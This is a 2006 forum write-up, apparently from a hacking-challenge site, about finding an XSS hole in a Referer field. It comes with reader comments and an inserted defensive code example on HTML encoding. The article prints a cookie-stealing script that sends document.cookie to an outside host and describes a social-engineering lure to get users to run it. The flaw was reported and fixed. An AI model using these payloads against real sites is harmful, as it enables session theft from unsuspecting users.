xss

An article about how I found an xss hole in hbh

===[ How I found out my first-real XSS ]===[ 0x702ch ]==========================

Ok, actually it is not the first real one, but misconfigured guestbooks don't count. When I started here on hbh I was in the process of realising that hacking is not (just) about rooting boxes or manipulating servers. The words exploitation, injection and scripting come to my mind. I googled the term 'xss' and found a lot of information on it. (I still have a lot to learn.) http://en.wikipedia/Wiki and http://ha.ckers.org are sites I recommend to you. I first thought that xss is just the toy of the wannabe skiddies, but soon realised that I was deeply mistaken. I set up a cookie stealer and experimented with it, then I completed two realistic challenges on hts, one of which involved 'cookie stealing'.

Then one day when I was just bored, tired of school... I got on hbh and went to the realistic 8 page. Well, it says that I should use a proxy. Nothing interesting... but wait! It says that they log my referrer and it is printed in plain text into the html source. I changed my referrer with RefControl to: <script>alert('xss');</script> and nothing happened! But I was cool enough to check the source, and I noticed that it doesn't escape the < and > characters! It only escaped the ', " and / characters! Ok, I tried this: <script>a=1337;alert(a);</script> and it worked! I was so happy that I had found an xss hole (or just found that the referrer isn't filtered for special characters).

I wasn't able to modify the page or add any content to it, but I didn't give up and checked ha.ckers.org, and there I found an interesting function: String.fromCharCode(88,83,83); it expands to "XSS". The numbers are the ascii values of the characters. Now I can construct strings without ' or ". But what can I do with this? Well, I tried to redirect the page to my cookie stealer! And it worked. To quickly construct any string I wrote a small C program that outputs a string as ascii values, each character separated by commas. So I put this string into it:

<script>window.location='http://my.com/cookie_stealer.php?c='+document.cookie</script>

It expanded to a couple of numbers which I pasted into my referrer:

<script>document.write(String.fromCharCode(numbers here like this x,x,x,x));</script>

I refreshed and it took me to my site; I checked the log and yes, there were my cookies!

You may think that this was useless, but let me explain how I could use this! (SE) Say I start a new thread and say that I have found an easter egg in one of hbh's realistic missions! To view it, install RefControl [link here] and paste this code into it:

code here

It is a series of JS function calls and their arguments, and you must use this form because ' and " are filtered.

After that, how many of you would check the code? And how many would use it! And what I would have are some nice cookies. But instead of doing all this, I reported the bug/exploit to Mr_Cheese and he quickly fixed it. Later when I asked him about the HoF he said that with this I can't get into it (cookie stealing and SE don't count). Okay, I said, no problem, I didn't write this article to force my way into the HoF; I understand him. This is just part of the story. And this is the big end!
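The flaw in the article comes down to one thing: the page escaped quotes and slashes but not < and >, so a quote-free payload built with String.fromCharCode went straight through. The following is an added example (not code from the article or from hbh) that models that filter beside a proper HTML entity encoder; the backslash-escaping and the example.invalid host are assumptions.

```javascript
// Added example, not code from the original article or from hbh itself.
// It models the flaw described above: the Referer header is written into
// the page after escaping only ', " and /.  Backslash-escaping (as PHP's
// addslashes would do) is an assumption; the article does not say how the
// three characters were escaped, only that < and > got through untouched.

// Assumed model of the original filter: quotes and slash get a backslash.
function weakEscape(value) {
  return value.replace(/['"\/]/g, ch => "\\" + ch);
}

// Defender's fix: entity-encode every character that changes meaning in HTML,
// so the Referer can only ever be displayed as text, never parsed as markup.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;",
                   '"': "&quot;", "'": "&#39;", "/": "&#x2F;" };
function htmlEncode(value) {
  return value.replace(/[&<>"'\/]/g, ch => ENTITIES[ch]);
}

// Simulates the "we log your referrer" line of the challenge page.
function renderReferer(referer, escapeFn) {
  return "<p>Your referrer: " + escapeFn(referer) + "</p>";
}

// True when the rendered HTML still contains a live opening <script> tag.
function containsScriptTag(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Constructed sample Referer using the quote-free shape from the article
// (String.fromCharCode(88,83,83) is just the string "XSS").
const SAMPLE_REFERER =
  "http://example.invalid/<script>document.write(String.fromCharCode(88,83,83))</script>";

const weakHtml = renderReferer(SAMPLE_REFERER, weakEscape);
const safeHtml = renderReferer(SAMPLE_REFERER, htmlEncode);

console.log("weak filter leaves script tag: " + containsScriptTag(weakHtml));      // true
console.log("entity encoding leaves script tag: " + containsScriptTag(safeHtml));  // false
```

The weak filter never touches the angle brackets, so the tag survives intact; the entity encoder turns the whole value into inert text regardless of which characters the payload avoids.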

Comments

netfish on October 20 2006 - 17:20:04
CRITICISM 2. Use spacing, and line breaks [ENTER] 3. Good job, tho, dude -- keep writing.
bl4ckc4t on October 20 2006 - 17:20:25
Not too bad. 9/10 BC
BluMoose on October 20 2006 - 19:52:38
Add some spacing, may make it a little more readable. But great info nonetheless.
AldarHawk on October 20 2006 - 21:33:42
well written. not too much of a NEW hack, just bad coding on the coder of Real 8. But Nice...7/10
mozzer on October 20 2006 - 23:00:26
Just like to say that I think that there is more damage which can be done with XSS than cookie stealing which I think Mr_Cheese sometimes ignores, CSRF. I may write an article on it actually
system_meltdown on October 20 2006 - 23:37:15
Dude, that thing about real8, I got HoF for that which is probably why you didn't.
chislam on October 21 2006 - 01:12:19
lol this isn't new, system did it.... lol
thatsflash on October 29 2006 - 12:14:15
:evil: